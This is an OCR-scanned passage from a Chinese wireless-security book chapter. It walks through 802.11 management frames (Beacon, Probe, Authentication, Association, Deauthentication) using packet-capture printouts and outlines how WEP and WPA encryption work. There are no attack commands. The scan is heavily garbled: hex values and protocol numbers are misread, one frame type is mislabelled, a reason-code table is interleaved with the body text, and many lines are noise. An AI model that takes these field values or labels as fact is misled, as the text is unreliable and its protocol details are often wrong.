下 图 为 抓 包 软件 抓 取 的 真实 Beacon 帧 。 


~ IEEE 892.11 Beacon frame, Flags: 
Type/Subtype: Beacon frame (9x9968 ) 
~ Frame Control Field: 9x8669 
ER 和 6969 = Version: 0 


.... 809.. = Type: Management frame (86) 
1868 .... = Subtype: 8 

» Flags: 9x96 

.900 696996 80808 6969 = Duration: 8 microseconds 

Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 

Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 

Transmitter address: Tp-LinkT Od:97:a2 (Qc:4b:54:8d:97:a2) 

Source address: Tp-LinkT_ ed:97:a2 (6c:4b:54:9d:97:a2) 

BSS Id: Tp-LinkT ed:97:a2 (96c:4b:54:6d:97:a2) 

A a 868688 = Fragment number: 0 

1911 16911 68111 .... = Sequence number: 2999 

~ IEEE 882.11 wireless LAN 

» Fixed parameters (12 bytes) 

» Tagged parameters (226 bytes) 


1. 帧 主体 


管理 帧 十 分 灵活 ， 帧 主体 (frame 
body) 中 的 大 部 分 数据 如 果 使 用 长 度 固 定 
的 字段 ， 就 称 为 固定 字段 (fixed field); 
如 果 字 上 段 长 度 不 确定 ， 就 称 为 信息 元 素 
(information element) 。 所 谓 信 息 元 素 ， 
是 指 长 度 不 确定 的 数据 块 (data block) 。 每 
个 数据 块 均 会 标注 类 型 编号 和 大 小 ， 各 
信息 元 素 的 数据 字段 元 素 都 有 特定 的 解释 
pa 

下 图 为 Beacon 帧 主体 数据 及 Capability 
Info 字 段 。 


” Ws B62. a a LAN 

~ Fixed bytes) 
Times stanp: 补 ei rt PE 

et sr 6.1692z466 [3cconds] 
Information: 11 


-1 三 ESS pe ties: Transmitter is cae 
B. = TRSS statm ran it6 Fr helnngs 
,二 CFP ee wm ep ee = coordinator at AP ({Bx98) 
= Privacy: AP/STA ca WEP 
,vv .... = Short Preamble: Not Allowed 

.. 8.. .... = PBCC: Not Allowed 
= Channel Aqgillity: Not ln 


Bi Ss, Bi sois 
pp B.Spectrum Management: Wot Inplemen nted 
sa sloe oes shurt SlvuL T 
PO toma i ry: Not Implemented 
PD sos aaa Radio Mea ee Implemented 


sme 和 

er en um ee = Delayed Block Ack; Not Implemented 
= Immediate Block Ack: Not Implemented 

i ramete' s (226 bytes) 


Beacon 帧 主体 数据 及 Capability Info 字 
段 的 主要 信息 介绍 如 下 : 

(1) Timestamp 〈 时 惟 ) 。 可 用 来 同步 
BSS 中 的 工作 站 ，BSS 的 主 计时 器 会 定期 
发 送 当前 已 使 用 的 微 秒 数 。 当 计数 器 到 达 
最 大 值 时 ， 便 会 从 头 开 始 计数 。《〈 对 一 
个 长 度 64bit、 可 计数 超过 580000 年 的 
计数 器 而 言 ， 很 难 会 遇 到 有 从 头 开 始 计数 
的 一 天 ) 

(2) Intrval。 定 时 发 送 位 ， 该 位 数据 表 
明 Beacon 帧 间隔 多 长 时 间 进 行 重 新 广播 。 

(3) Capability Info〈 性 能 信息 ) 字段 。 
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黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


传送 Beacon 信号 的 时 候 ， 它 被 用 来 告知 网 
络 具 备 何 种 性 能 ， 此 字段 应 用 于 Beacon 帧 、 
Probe Response 帧 、Probe Request 帧 。 


2. Beacon 巾 标记 参数 
下 图 为 Beacon 帧 标记 参数 。 


~ IEEE 562.11 wireless LAN 
» Fixed parameters 【12 bytes) 
~ Tagged parameters (226 bytes) 
Tag: SSID parameter set: TP-LINK 97A2 

» Tag: Supported Rates 1(B), 2(B), 5.5(B), ii{B), 9, 18, 36, 54, [Mbit/sec] 
» Tag: DS Parameter set: Current Channel: 1 
» Tag: Extended Supported Rates 6, 12, 24, 489, [Mbit/sec] 
» Tag: Country Information: Country Code CN, Environment Any 
» Tag: AP Channel Report: Operating Class 32, Channel List ; 1, 2, 3, 
» Tag: AP Channel Report: Operating Class 33, Channel List : 5, 6, 7, 


r 更 


4 
8, 
» Tag; Traffic Indication Map (TIM):; DTIM B of B bitmap 

» Tag: Vendor Specific: Microsoft Corp.: WPA Information Element 

» Tag: RSN Information 

» Tag: ERP Information 

» Tag: HT Capabilities {8862.1in D1. ee, 

» Tag: HT Information {862.11n D1.16) 

» Tag: lee nhs BSS Scan Parameters 

» Tag: Vendor Specific: Microsoft Corp.: WMM/WME: Parameter Element 

» Tag: QBSS Load Element 862.11e CCA Version 

» Tag: vendor Specific: Ralink Technology, Corp. 


主要 参数 介绍 如 下 : 

(1)SSID 信 息 。 包 括 SSID 的 网 络 标 识 、 
SSID 的 长 度 等 ， 如 果 设 置 隐藏 AP 抓 到 的 
数据 帧 中 SSID 为 空 ， 但 是 长 度 有 数据 ， 通 
过 这 点 可 以 判断 是 否 有 隐藏 AP。SSID 信 
恩 如 下 图 所 示 。 


~ Tag: SSID parameter set: TP-LINK 97A2 
Tag Number: SSID parameter Set (9) 
Tag length: 12 
SSID: TP-LINK 97A2 


(2) Supported Rates 字段 。AP 所 支持 的 
工作 速率 ， 如 下 图 所 示 ， 通 过 这 个 速率 也 
可 以 大 概 判断 AP 是 支持 哪 种 IEEE 802.11 
协议 。 
rr Tag: Supported Rates 1(B)，2(B)，5.5{(B)，11(B)，9，18，36，54， [Mbit/secl] 
ee upporEee Rates (1) 

Supported Rates: 1(B) (9x82) 


supported Rates: 2(B) (@x84) 
Supported Rates: 5.5(B) (Ox8b) 


supported Rates: 4i(B) (gx96) 
Supported Rates: 9 (6x12) 
supported Rates: 18 (QOx24) 
Supported Rates: 36 (Ox48) 
supported Rates: 54 (Qx6c) 


(3) DS Parameter Set 字 段 。AP 工 作 
信道 ， 如 下 图 所 示 。 描 述 了 当前 工作 的 信 
道 ， 实 际 上 这 个 字段 在 Radiotap 中 有 。 
Radiotap 是 网 卡 在 接收 信号 时 ， 去 除 PLCP 
header 部 分 后 ， 在 本 地 增加 的 头 部 ， 其 中 就 
有 功率 、 信 道 这 样 的 物理 层 信 息 。 


- Tag: DS _ Parameter set: Current Channel: 1 
Tag Number: DS Parameter set (3) 
Tag length: 1 
Current Channel: 1 


AP 中 文 持 的 扩展 速率 ， 
所 示 。 


如 右上 图 
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~ Tag: Extended Supported Rates 6, 12, 24, 48, [Mbit/sec] 
Tag Number : Extended Supported Rates (50) 
Tag length: 4 
Extended Supported Rates: 6 (QxQc) 
Extended Supported Rates: 12 (9x18) 
Extended Supported Rates: 24 (9x30) 
Extended Supported Rates: 48 (9x60) 


(4) country 字段 。 表 面 上 这 个 字段 用 
处 不 大 ， 仅 仅 表 明了 国家 代号 。 实 际 上 这 
个 字段 是 用 来 控制 信号 发 送 功率 的 。 由 于 
每 一 个 国家 都 有 相应 的 法 律 管理 RF 发射 
功率 ， 不 能 够 违法 。 在 beacon 中 ， 即 通过 
country 字段 来 限制 所 有 节点 的 发 射 功率 。 
同样 的 ， 也 有 限定 能 够 使 用 的 信道 范围 ， 
如 下 图 所 示 。 


bi 可 Tv Information: ry Code CN, Environment Any 
ember r: Co dew Infor (7) 
Ta i le 6 


er Any [Ox20 


» Country info: First Channel Nunber: 1, Number of Channels: 13, Maximum Transmit power Level: 28 dem 


(5) TIM 标记 。 这 里 主要 就 是 与 DTIM 
有 关 ， 有 关 Beacon 周期 设置 与 节能 有 关 的 
部 分 ， 都 与 该 字段 有 关 ， 如 下 图 所 示 。 


- Tag: Traffic Indication Map (TIM): DTIM © of © bitmap 
Tag Number: Traffic Indication Map (TIM) (5) 
Tag length: 4 
DTIM count: 0 
DTIM period: 1 
~ Bitmap control: 0x69 
a © = Multicast: False 
0606000 600. = Bitmap Offset: 96x99 
Partial Virtual Bitmap: 08 


Association ID: 9x63 
(6) Vendor Specific。 使 用 WPA 进行 数 
据 加 密 ， 不 是 每 个 设备 都 会 选取 该 字段 ， 
如 下 图 所 示 。 


- Tag: vendor Specific: Microsoft Corp.: WPA Information Element 
Tag Number: Vendor Specific (221) 
Tag length: 22 
OUI: 90:50:f2 (Microsoft Corp.) 
Vendor Specific OUI Type: 1 
Type: WPA Information Element (x61) 
WPA Version: 1 
* Multicast Cipher Suite: 00:50:f2 (Microsoft Corp.) AES (CCN) 
Multicast Cipher Suite 0UI: 09B:50:f2 (Microsoft Corp.) 
Multicast Cipher Suite type: AES (CCM) (4) 
Unicast Cipher Suite Count: 1 
v Unicast Cipher Suite List 69:56:f2 (Microsoft Corp.) AES (CCN) 
» Unicast Cipher Suite: ©0:50:f2 (Microsoft Corp.) AES {CCM) 
Auth Key Management (AKN) Suite Count: 1 
~ Auth Key Management (AKM) List QB8:5g:f2 (Microsoft Corp.) PSK 
~ Auth Key Management (AKN) Suite: 99:5@:f2 (Microsoft Corp.) PSK 
Auth Key Management (AKM) OUI: 696:59:f2 (Microsoft Corp.) 


Auth Key Management (AKM) type: PSK (2) 


(7) ERP information 部 分 。ERP 全 称 
是 Extended Rate PHY， 就 是 802.11g 对 应 
的 模式 。 在 这 里 主要 是 为 了 兼容 模式 所 存 
在 ， 主 要 关注 其 中 的 Non ERP Present 位 ， 
通过 该 位 ， 可 以 同步 全 网 开启 对 802.11b 的 
兼容 ， 人 否则 束 关 闭 兼 容 。 由 于 是 beacon 进 
行 同步 的 ， 所 以 一 旦 开启 ， 全 网 所 有 的 STA 
都 是 工作 在 兼容 模式 下 ， 如 下 图 所 示 。 


第 6 章 ”数据 帧 的 结构 与 加 密 原理 


~ IEEE 802.11 wireless LAN 
~ Tagged parameters (68 bytes ) 
~ Tag: SSID parameter set: Wan 
Tag Number: SSID parameter set (90) 


- Tag: ERP Information 
Tag Number: ERP Information (42) 
Tag length: 1 


~ ERP Information: Ox04 Tag length: 3 

Eis 5 SSID: wan 

I ER 9 = Non ERP Present : Not Set » Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
。.0. = Use Protection: Not set » Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 

.... .1.. = Barker Preamble Mode: Set » Tag: DS Parameter set: Current Channe]: 1 

9 2 » Tag: HT Capabilities (802.11n D1.10) 
9000 6... = Reserved: 9x69 » Tag: Vendor Specific: Microsoft Corp.: Unknown 8 

a 


Tag: Extended Capabilities (5 octets) 


6.3.3 ”Probe Request (探测 请 求 ) 帧 


Probe Request (探测 请 求 ) 帧 ， 该 帧 
一 般 用 于 STA 探 测 网 络 中 的 AP 时 来 使 用 ， 


6.3.4 Probe Response (回应 探测 
响应 ) 帧 


六 


有 两 和 形式 第 1 种 形式 为 探测 网 络 中 所 有 Probe Response 帧 的 MAC 头 信息 ， 如 同意 
下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 六 


， 第 2 种 形式 为 探测 之 前 连接 过 的 AP。 
pie 求 后 并 且 STA 之 
前 连接 过 该 AP， 此 时 AP 会 回应 一 个 Probe 
Response〈 回 应 探测 啊 应 ) 帧 。 

Probe Request 帧 的 MAC 头 信息 ， 如 
下 图 所 示 ， 其 中 Type 位 为 0， 表 明 是 管理 
帧 ，Subtype 位 为 4， 表 明子 类 型 为 Probe 
Request 巾 。 


~ IEEE 802.11 Probe Request, Flags: 
Type/Subtype: Probe Request (QOQx0004) 
~ Frame Control Field: QOQx4000 
00 = Version: 0 
.... 00.. = Type: Management frame (0) 
0100 .... = Subtype: 4 
» Flags: 9Xx99 
.000 0000 0000 09009 = Duration: © microseconds 
Receiver address: Broadcast (ff:ff:ff:ff:ff:ff) 
Destination address: Broadcast (ff:ff:ff:ff:ff:ff) 
Transmitter address: Google e0:c2:23 (da:ali:19:e0:c2:23) 
Source address: Google e0:c2:23 (da:al:19:e0:c2:23) 
BSS Id: Broadcast (ff:ff:ff:ff:ff:ff) 
oe 00090 = Fragment number: 0 
9119 1011 1619 .... = Sequence number: 1722 


当 SSID 长 度 为 0 时 ，Probe 不 包含 具体 
的 SSID 信 息 ， 如 果 某 个 AP 隐藏 了 SSID， 就 
不 回应 这 种 Probe Request， 如 下 图 所 示 。 


~ IEEE 802.11 wireless LAN 

* Tagged parameters (65 bytes ) 

Tag: SSID parameter Set: Wildcard SSID 

Tag Number: SSID parameter Set (0) 

Tag length: 9 

SSID : 
Tag: Supported Rates 1, 2, 5.5, 11, [Mbit/sec] 
Tag: Extended Supported Rates 6, 9, 12, 18, 24, 36, 
Tag: DS Parameter set: Current Channel: 1 
Tag: HT Capabilities (802.1ln D1.10) 
Tag: Vendor Specific: Microsoft Corp.: 
Tag: Extended Capabilities (5 octets) 


当 SSID 长 度 大 于 0 时 ， 此 SSID 即 为 要 扫 
描 SSID， 如 果 SSID 隐 藏 ， 当 收 到 这 种 Probe 
Request 包 ， 必 须 回应 Probe Response 帧 ， 
Probe Response 包 含 了 很 多 SSID 的 信息 ; 这 
种 类 型 的 包 对 于 连接 隐藏 SSID 是 必要 的 ， 
如 下 图 所 示 。 


Unknown 8 


™ ww ww ww ww ww 


帧 ，Subtype 位 为 5$， 表 明子 类 型 为 Probe Re- 
sponse 帧 。 


Type/Subtype: Probe Response (9X6905 ) 


69 = Version: 9 
.... 6069.. = Type: Management frame (9) 
G101 .... = Subtype: 5 


上 

.909 0000 1161 1111 = Duration: 223 microseconds 

Receiver address: Guangdopn_6f:er:df (38:29:5a:6f:e7:df) 
Destination address: Guangdon_6f:e7:df (38:29:5a:6f:e7:df) 
Transmlitter address: HuaweiTe_7d:37:95 (e4:68:a3:7d:37:95) 
Source address: HuaweiTe 7d:37:95 (e4:68:a3:7d:37:95) 

BSS Id: HuaweiTe_7d:37:95 (e4:68:a3:7d:37:95) 
a 90999 = Fragment number: 9 

9100 10009 69016 .... = Sequence number : 1154 


下 图 为 Probe Response 帧 数据 部 分 
信息 。 


F IEEE 862.11 wireless LAN 
* Fixed parameters (12 bytes) 

Timestamp: Bxopbbob69lbfe93d92 

Beacon 9. pp [Seconds] 

i abilities Informatil 21 

= i ra Iran a is an Ab 
。 ,.0, - IBSS slulyu Transmiltler belornrys Lu uu BSS 
，= CFP be ibet capabilities: No point coordinator at AP (090x690) 
= Privacy: PA cannot support WEP 
. 1. .Short Preamble: Allowed 
和 = etd No t Allowed 

0 Bes 。 = el Agility’: Mnf 
PE 时 二 邮 与 证 本 二 记 二 天 直 - 重 pp Management : or pt 
ue edos usass ooon Short 510 Tine: In 
“os Os = Automatic Power Save "Delivery: Not Implemented 
= Radio Measurement: Not Implemented 
,, 8，,,,，,,,，,.,，= DSSS-OFDM: Not Allowed 
"OO ,二 Delayed Block Ack; Not Implemented 
= Immediate BLOCK ACK: NOCT IMPlemented 
Tayyed pat a T『 5 和 和 
» ID 


和 


» Tag; S rte dd Ra te pt 2(B), 5,5(B8), 11(B), 6, 9, 12, 18, [Mbit/scc] 
» Tag: ps thee eet: Current Channel: 1 
» Tag: Country Information: Country Code CN, Environnent Any 


» Tag: TPC Report Transmit Power: 39, Link Nargin: 2 

» Tag: ERP Informatio 

» Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] 

» Tag: Vendor Specific: Microsoft Corp.: WMM/WNE: Parameter Element 

» Tag: Vendor Specific: Atheros Communications, Inc.: Advanced Capability 


其 中 ，Beacon Iterval 字 段 给 出 了 Beacon 
帧 发 送 间 隔 ，ESS 字 段 表明 该 数据 由 AP 端 
发 送 ， 其 中 Tagged 标 记 中 还 会 给 出 SSID 以 
及 传输 速率 ，AP 是 根据 SSID 以 及 传输 速率 
判断 此 STA 是 否 连接 过 ， 如 果 这 两 个 字段 
相同 ， 即 使 STA 与 AP 之 前 并 没有 建立 过 连 
接 ，AP 也 会 回应 Probe Response 帧 数据 。 


6.3.5 Association (身份 认证 ) 帧 


Association (身份 认证 ) 帧 的 MAC 头 首 rs 
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信息 ， 如 下 图 所 示 ， 其 中 Type 位 为 0， 表 明 
是 管理 帧 ， Subtype 位 为 11 》 表明 子 类 型 为 
Probe Request 帧 [。 


~ IEEE 8902.11 Authentication, Flags: ........ 
Type/Subtype: Authentication (9x9og9b) 

~ Frame Control Field: Oxb0O900 
= Version: © 

.... O00.. = Type: Management frame (©) 

1611 .... = Subtype: 11 
» Flags: 9x90 
.999 0009 11061 1111 = Duration: 223 microseconds 
Receiver address: Guangdon_ 6f:e7i:df (38:29:5a:6f:e7:df) 
Destination address: Guangdon_6f:e7:df (38:29:5a:6f:e7:df) 
Transmitter address: HuaweiTe_7d:37:92 (e4:68:a3:7d:37:92) 
Source address: HuaweiTe 7d:37:92 (e4:68:a3:7d:37:92) 
BSS Id: HuaweiTe_7d:37:92 (e4:68:a3:7d:37:92) 
ee 9099 = Fragment number: 0 
001 69699 0000 .... = Sequence number: 256 


下 图 为 Association 帆 数据 部 分 。 


~ IEEE 802.11 wireless LAN 
r Fixed parameters (6 bytes ) 
Authentication Algorithm: Open System (0) 
Authentication SEQ: Qx0002 
Status code: Successful (QOQx00060) 


主要 参数 介绍 如 下 : 

(1) Authentication Algorithm。 身份 认 
证 类 型 ， 取 值 为 0 代表 开发 系统 身份 认证 
无 须 密 码 ， 取 值 为 1 代表 为 共享 密 钥 身份 
认证 。 

(2) Authentication SEQ。 号 份 认证 帧 
序列 和 号， 由 于 身份 认证 会 有 多 个 帧 交换 ， 
所 以 SEQ 是 每 次 身份 验证 的 中 的 一 个 序列 
号 ， 取 值 为 1 ~ 65535 这 个 范围 。 

(3) Status Code。 认 证 是 否 成 功 。 

(4) Challenge text。 该 字段 只 有 使 用 共 
享 密 钥 才 会 出 现 ， 用 于 存放 密 钥 。 


Association i 


当 移 动工 作 站 试图 关联 接 入 点 时 ， 接 
入 点 会 回复 一 个 Association Response (关联 
吧 应 ) 或 Reassociation Response (重新 关联 
啊 应 ) 帧 ， 两 者 之 间 的 差别 在 于 Frame Con- 
trol 位 所 记载 的 subtype 位 。 所 有 位 均 是 必须 
的 。 在 应 答 的 过 程 中 ， 接 入 点 会 指定 一 个 
Association ID (关联 识别 码 ) ， 至 于 指定 
的 方式 则 因 实 际 操作 而 不 同 。 

下 图 为 Association Request (关联 请 
求 ) 帧 的 MAC 信 息 。 
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Type/Subtype: Asspciation Request (9x9000 ) 


人 99 = Version: 9 
.... 00.. = Type: Management frame (9) 
8000 .... = Subtype: © 


.000 96001 089011 1010 = Duration: 314 microseconds 

Receiver address: 62:1f:3f:7f:5e:4d (62:1f:8f:7f:5e:4d) 
Destination address: 62:1f:8f:7f:5e:4d (62:1f:8f:7f:5e:4d) 
Transmitter address: Guangdon_12:c5:c8 (dc:6d:cd:12:c5:c8) 
Source address: Guangdon 12:c5:c8 (dc:6d:cd:12:c5:c8) 

BSS Id: 62:1f:8f:7f:5e:;4d (62:;1f:;8f:7f:5e:;4d) 
re 9999 = Fragment number: 9 

906011 1011 8010 .... = Sequence number: 946 


下 图 为 Association Request 帧 数据 
部 分 。 


-11 wireIess LAN 
- Fixed parameters (4 bytes) 
~ Capabilities ee OXx9401 


0. = 3 一 Transnitter 人 to a BSS 
ae . = CFP participation capabilities: No point coordinator at AP (Bx66) 
--..:0 .... = Privacy: AP/ 


STA cannot support WEP 
:六 a . = Short Preamble: Not Allowed 
,vv，, 旧 ,，,,,，= PBCC: Not Allowed 
+18,,, ,,.. = Channel Agility: Not in 
,so 昌 .二 S5pecCcrum Management: NOC pr 
isae ess sans acesa B Short Blot Time: In LS 
‘a Ou .=Automatic Power Save Delivery: Pr Implemented 
sass sans sses sea = Radio Measurement: Not Implemente 
,, 昌 ，,,,.，..,,，,,.，= DSSS-OFDM: Not Allowed 
,Bi -Delaycd Block Ack; No Implementl ey 
.= ImMmediate Block Ack: Not Implemented 
Listen Interval: 9x9961 
r Tagged parameters (65 bytes) 
ag: SSID parameter set: CMCC- 
» Tag; Supported Rates 1(B), Re J 5S(B), 11{8), 10, 24, 36, 54, [Mbit/sec] 
» Tag: Extended Supported Rates 6, 9, 12, 45, [Mbit/sec] 
» Tag: HT Capabilities (892.1in D1.18) 
» Tag: Vendor Specific: Microsoft Corp.: WMM/WME: Information Element 


下 图 为 Association Response (关联 啊 
应 ) 帧 MAC 信 息 。 


Type/Subtype: AssDciation Response (QOQx0001) 


ds ge 99 = Version: 9 
.... 00.. = Type: Management frame (9) 
G001 .... = Subtype: 1 


.909 9009 9111 1111 = Duration: 127 microseconds 

Receiver address: O00:bO:6c:13:8f:55 (00:b9O:6c:13:8f:55) 
Destination address: 9090:b9:6c:13:8f:55 (00:b0:6c:13:8f:55) 
Transmitter address: HuaweiTe_7d:37:91 (e4:68:a3:7d:37:91) 
Source address: HuaweiTe 7d:37:91 (e4:68:a3:7d:37:91) 

BSS Id: HuaweiTe_7d:37:91 (e4:68:a3:7d:37:91) 
ee 9999 = Fragment number: 0 

0001 0000 0001 .... = Sequence number: 257 


下 图 为 Association Response 帧 数据 
部 分 。 


~ IEEE B02.11 Wireless LAN 
r Fixed parameters {6 bytes) 

~ Capabilitios Information: AxBA424 

ssss assa ssss sas 1 = ESS capabilities: Transnitter is an AP 
,.，.,,，,,,，,, 日 = IBSS status: Transmitter belongs to a BSS 
vv,，99.，= CHhP participation capablilities; NO point coordinator af AP (gx09) 
eeee seas ene 9 .... = Privacy: AP/STA cannot support WEP 
sr sd, ,= Short Preamble: Allowed 
ss es Bb., .= PBCC: Not Allowed 
六 B.....-. = Channel Agility: Not in use 
sass sess soos sss。 - SpecLlrues ManaygemeliL: NOL ImplemertLeu 
we + = Short Slot Time; In use 
owas sn toue eos = Automatic Power Save Delivery: Not Implemented 
,= Radio Measurement: Not Implemented 
“a0 .= DSSS-OFDM: Not Allowed 
< 四。 = = Dclaycd Dlock Ack: Not Implemented 
6. = Tmmediate Plock Ack: Not TaNnlementer 
Status code: Successful 【9xBbB6B) 

.BB 66668 66866 1668B = Association ID: AQxBOB8 

- Tagged parameters (42 bytes) 

+ Tag: Supported Rates 1{6), 2(6), 5.5(6), 6, 9, 11{6), 12, 18, [Mbit/sec] 

» Tag: Extended Supported Rates 24, 35, 48, 54, [Mbit/sec] 


» Tag: Vendor Specific: Microsoft Corp.: WMM/wWME: Parameter Element 


其 中 Status code 字 段 表 明 是 否 关 联 成 
功 ，Association ID 字段 是 关联 成 功 后 AP 给 
客户 端的 一 个 ID， 用 于 标记 在 AP 关联 列表 
中 ， 也 用 于 客户 端 唤醒 时 使 用 。 


6.3.7 Disassociation 与 Deauthentication 


- A 人 Reason 
Disassociation 〈 取 消 关 联 ) 怖 用 来 取 pe Description Meaning0 
区 . . OQae 
消 一 段 关 联 关 系 ， 而 Deauthentication 〈( 解 
“| 、 i AP 1s busy and 
除 认 证 ) 帧 则 用 来 解除 一 段 认 证 关系 。 两 和 下 
1SaSSOCclatlon Unable to Nandle 
A 人 到 Pb, ™ 
者 均 包 售 定位 Reason Code (原因 和 Busy currently associated 
™ a = 上 上 
码 ) ， 当 然 Frame Control 位 彼此 不 同 ， 因 为 clients 
不 同类 型 的 管理 帧 拥有 不 同 的 子 类 型 。 i 
pi、 i Class2 Frame from 
下 图 为 Disassociation 帧 数据 信息 。 | transfer data before 
6 Non-Authenticated 
[= IEEE 862.11 Disassociate, Flags: se . 1t Was 
Type/Subtype: Disassociate {9xggga) Station 
ee Authenticated 
---- G0.. = Type: Management frame (6) 
16346 .... = Subtype: 18 
0 一 Client attempted to 
Receiver address: VivoMobi_ 84:62:86 (19:f6:81:84:62:36) Class3 Frame from 
ee ee transfer data before 
Source address: HuaweiTe 8c:1ig:a2 {(b4:15:13:8C:10:a2) 2 Non-Associated 国 
BSS Id: HuaweiTe Bc:19:a2 (b4:15:13:8c:10:a2) 1t Was 
和 BOB - nda patile err 9 Station 
.IEEE B02.11 wireless UW Ee Associated 
- Fixed parameters (2 bytes) 
Reason code: Disassociated because sending STA 15 Meaving Lor has left}) BSS CxAABS) 
| Disassociation STA | STA 1s leaving or has 
下 图 为 Deauthentication 帧 信息 。 8 a i 
~ IEEE 862.11 Deauthentication, Flags: ....R... 
Type/Subtype: Deauthentication (6x666c) STA Request STA(re) assoclation 
~ Frame Control Field: 9xc968 ， 
‘+ 09 = Version: 6 Association ls not authenticated 
.... 00.. = Type: Management frame (9) 9 
1100 .... = Subtype: 12 ] ] 
,EE Without with 


.909 G660 0111 1111 = Duration: 127 microseconds 

Receiver address: XiaomiCo b5:d8:d3 (78:92:f8:b5:d8:d3) 
Destination address: XiaomiCo _b5:d8:d3 (78:92:f8:b5:d8:d3) 
Transmitter address: HuaweiTe 8c:10:a5 (b4:15:13:8c:10:a5) 
Source address: HuaweiTe 8c:10:a5 (b4:15:13:8c:10:a5) 

BSS Id: HuawelTe_8c:16:a5 (b4:15:13:8c:10:a5s) 


Authentication Responding station 


0 G0860 = Fragment number: © 
0061 6060 1616 .... = Sequence number: 266 
Y IEEE 882.11 wireless LAN ED 
- Fixed parameters (2 bytes) Code 
Reason code: Previous authentication no longer Valid (DBx9992) 


其 中 Reason code 字 段 表 明 取 消 关 联 或 
者 解除 认证 的 方式 ， 见 下 表 。 
表 取消 关联 或 者 解除 认证 的 方式 


Missing Reason Client momentarily 


In an unknown state 


6.4 ”无 线 通 信 加 密 原 理 
在 了 解 了 无 线 通信 的 数据 帧 结构 后 ， 


Reason | Dosorioton Meaning0 ”下 面 介绍 无 线 通信 的 加 密 原理 ， 目 前 无 线 

ee 通信 中 的 加 密 方式 有 两 种 ， 分 别 是 WEP 与 

0 Normal operation WPA。 其 中 ，WAP 又 分 为 WPA1 与 WPA32 
Client assoclated but 两 种 9 


1 Unspecified Reason 
P no longer authorized 


6.4.1 WEP 的 加 密 原理 es 
Client ele but WEP 通 过 RC4 算 法 进行 加 密 ， 通 过 六 党 : : 


Previous 


pp, Authentication no 


| not authorized 
人 CRC32 算 法 进行 数据 完整 性 校 验 。RC4 加 密 
Deauthenticated 解密 的 原理 如 下 。 
Deauthentication because sending STA 
3 | . 加 密 解密 
leaving ls leaving IBSS or 
et 1011B 1000 8 
001 1 XOor 
Disassociation Due | Client session DU or 0011 3 
to Inactivity timeout exceeded 1000 8 1011 B 
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WEP 整 个 加 密 过 程 可 以 通过 一 张 图 来 
描述 ， 如 下 图 所 示 。 其 中 , IV (Initializa- 
tion Vector) 为 初始 同 量 ， 由 客户 端 随机 
生成 。 


校 验 信息 


初始 数据 
CRC32 
a 


整个 WEP 加 密 的 过 程 ， 如 果 要 分 步骤 
来 描述 ， 可 以 分 为 以 下 几 个 步骤 : 
由 客户 端 随机 生成 IV， 然 后 与 无 线 密 
码 相 结合 生成 KSA (初始 向 量 表 ) 。 
原始 发 送 数 据 通 过 CRC32 生 成 ICV 
(数据 完整 性 校 验 信息 ) 。 
原始 数据 与 CV 结合 生成 数据 流 。 
step 阴 通过 PRGA 算 法 结合 数据 流 长 度 ， 计 
算 生 成 密 钥 流 。 密 钥 流 与 数据 流 是 一 一 对 
应 的 关系 。 
密 钥 流 与 数据 流 异 或 运算 得 到 加 密 后 
数据 。 
发 送 数据 包头 部 包含 IV 人 信息， 尾部 
包含 IJCV 人 信息， 如果 发 送 数 据 超出 数据 包 大 
小 ， 会 对 数据 包 进 行 切 片 处 理 ， 此 时 IV 后 
面 会 跟 上 Key ID，Key ID 用 于 标识 该 数据 和 包 
是 切片 后 数据 包 的 第 几 个 包 。 


山寺 昌 6.4.2 ”WPA 的 加 密 原理 


性 WPA 分 为 WPA1 和 WPA2， 最 早出 现 

WPA1 是 因为 WEP 存 在 严重 漏洞 ， 因 此 
WPA1 的 出 现 是 为 了 解决 当时 WEP 所 存在 的 
缺陷 ， 它 是 在 WEP 的 基础 上 通过 软件 实现 
密码 扩充 。 

WPA1 与 WEP 的 相同 之 处 在 于 它们 都 是 
采用 逐 包 加 密 ，128 位 的 Key 和 48 位 的 初始 
回 量 CIV) ， 同 样 使 用 RC4 流 加 密 技 术 ， 
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不 过 ，WPA1 采 用 了 帧 计数 姻 ， 可 以 有 效 避 
免 数据 重 放 攻 击 ， 并 且 采 用 了 TKIP (动态 
WEP) 算法 ，TKIP 由 RC4+Michael 完 整 性 
校 验 所 组 成 。 

WPA2 则 是 依据 802.11 全 新 设计 来 实现 
的 ， 它 使 用 CCMP 蔡 代 了 TKIP， 使 用 AES 
加 密 算法 替代 了 RC4 算 法 ， 由 于 是 全 新 设计 
的 ， 因 此 不 同 下 兼容 WEP 设 备 。 

WPA 在 数据 通信 中 会 有 三 个 过 程 : 


1. 协商 安全 协议 


协商 认证 方式 中 STA 会 通过 探测 帧 获取 
到 AP 中 的 网 络 信息 ， 其 中 包括 速率 、 加 密 
方式 、 信 道 以 及 网 络 名 称 ， 同 样 会 协商 通 
信 模 式 采 用 单 播 、 组 播 还 是 广播 ， 加 密 套 
件 使 用 TKIP 还 是 CCMP。 


2. 窗 钥 分 发 和 验证 


无 线 网 络 设计 用 于 一 组 无 线 设 备 通信 ， 
关联 到 同一 设备 共享 无 线 信道 ， 根 据 通 信安 
全 特性 不 同 ， 分 为 单 播 、 组 播 和 广播 。 

单 播 通信 是 AP 与 STA 之 间 的 一 个 私密 
通信 ， 因 此 它们 会 保存 彼此 的 一 个 私 钥 PTK 
(Pairwise Key) 也 被 称 为 点 到 点 密 钥 ， 这 个 
密 钥 是 临时 性 的 ， 一 旦 到 期 需要 重新 计算 。 

组 播 通信 是 AP 与 域内 所 有 成 员 共 享 的 
同一 密 钥 GTK (Group Key) 组 密 铀 ， 这 个 
密 钥 在 域内 的 所 有 成 员 都 知道 ， 用 于 AP 发 
送 组 播 使 用 。 

广播 通信 一 般 是 不 加 密 的 ， 主 要 用 于 
AP 回 整 个 区 域 宣告 存在 ， 任 何 本 区 域 的 设 
备 都 可 以 获取 到 广播 信息 。 


3. 数据 加 密 完整 性 校 验 

PMK (Pairwise Master Key) 是 一 串 
256 位 即 32 字 节 的 密 铀 ，PMK 的 计算 公式 ， 
ESSID+PSK+ 人 迭代 次 数 4096 次 再 通过 Hash 计 
算 生 成 ， 其 中 PSK 是 无 线 密码 ，PMK 是 由 
